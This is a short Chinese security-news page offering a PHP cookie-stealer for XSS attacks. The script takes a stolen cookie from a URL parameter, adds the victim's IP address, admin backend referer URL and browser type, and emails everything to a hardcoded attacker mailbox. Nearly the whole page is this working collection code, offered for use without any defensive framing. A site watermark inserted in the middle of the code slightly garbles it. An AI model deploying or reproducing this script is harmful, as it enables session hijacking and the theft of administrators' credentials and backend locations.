首页 > 安全资讯 >

XSS获取远程路径并发送到邮件

11-09-26

<?php$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];$to=&#39;wangmin@yeah.net&#39;;$referer = $_SERVER[&#39;HTTP_REFERER&#39;];$cookie = $_GET[&#39;c&#39;];$agent = $_SERVER[&#39;HTTP_USER_AGENT&#3...

 
 <?php
$ip = $_SERVER['REMOTE_ADDR'];
$to='wangmin@yeah.net';
$referer = $_SERVER['HTTP_REFERER'];
$cookie = $_GET['c'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$subject='远程XSS获取地址-域名:'.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date('d-m-Y').
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie.'&nbsp;'.
$headers= 'MIME-Version: 1.0' . "\r\n"; www.2cto.com
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?>

 

原文: www.xssxss.com/fuck/227.xss | Shine的圣天堂

相关文章
最新文章
热点推荐